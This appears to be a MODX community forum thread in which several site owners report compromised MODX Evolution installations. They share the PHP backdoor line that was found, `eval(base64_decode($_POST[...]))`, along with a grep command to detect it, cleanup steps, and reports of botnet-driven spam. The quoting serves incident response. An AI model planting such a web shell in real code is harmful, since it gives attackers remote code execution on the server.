Malicious Files Detected on my server account

Hello modxers!!

I get an email from my hosting company that they detect malicious files on my server.

I am using modx evolution 1.14(latest version) and nothing more.

Here is the message

"The malicious code detected is similar to:

Files containing content similar to the following:

<?php eval(base64_decode($_POST['<random_string_here>']));?>

These are malicious scripts that allow for remote execution of malware and spam by unauthoarized users. Generally these are POSTed to, which then causes other compromises on your account. We have cleaned this particular string of code off your account, but we recommend you review your account in and around the directories where the listed files are to check for further malware."

They have right or not?

Thanks in advanced!!!

MODX does contain files with base64_encode and base64_decode in them, but the files they refer to could still be malicious files that are not part of MODX. You'd have to look at the actual files.

We had the same issue yesterday on about 10 modx (different versions) evolution websites on different servers..
They are not modx files, or added to existing modx files. We cleaned everything, but didn't find where it came from!

We do think it could be a vulnerability of MODX, mostly they were added to tinyMCE directories.
There was no ftp access on those websites.

For what it's worth, I think there may be a zero-day out in the wild for Evo... I've seen too many of these pop up on my sites, even when things are supposedly patched. That's just my own paranoia, but the kosher line is to clean things out and restore from "known-good" copies of everything. I outlined this in an article here: http://tipsfor.us/2013/01/14/help-my-site-was-hacked/

This is what I did:

1. Indicate the hacked websites (ssh): find /home -iname '*.php' | xargs grep "eval(base64_decode(" -s1
2. Backup all data ((files/mysql)
3. changed all passwords of (mysql/ftp etc.)
4. Deleted all the modx files, re-installed modx version 1.0.14 and returned all data (files/mysql)

A time consuming but secure solution, in my opinion.

Same here. Many projects were compromised. Different modx evolution versions.
This code was found in many files:
<?php eval(base64_decode($_POST['<random_string_here>']));?>

Watch out as mentioned new files were added with the code!
But exsisting files are moderated on top with the code!

It seems a big problem is there anybody who knows how they get in?
It not seems that it's done by ftp but by upload.
So there should be a leak in the files of modx...

This affected our servers on the weekend. The above mentioned script hacks queued around 127,000 SPAM emails to our server in 24 hours and caused all sorts of load issues.

The interesting thing here is the oldest of these scripts dates right back to October 2012, it was just sitting there all this time. Then recently around 60 copies of it were created or existing scripts modified all through the directories.

This is what was added as an example:



The $_POST variable is usually different across different sites.

I haven't been able to ascertain the entry point for these scripts at this time but it does appear to be from a web request to MODx. These files were not uploaded through SFTP/FTP.

This has also hugely affected a partner company we work with, across six servers, all hacks were affecting old versions of Evolution only from what we can see so far.

That looks like it was receiving commands from a botnet controller.

Quote from: sottwell at Aug 11, 2014, 02:07 AM

That looks like it was receiving commands from a botnet controller.

It definitely was. Looking at the access logs I can see a tonne of different IP addresses posting to the scripts with that line at the top (usually).

The entry point where all of this code was injected to the server is still unknown.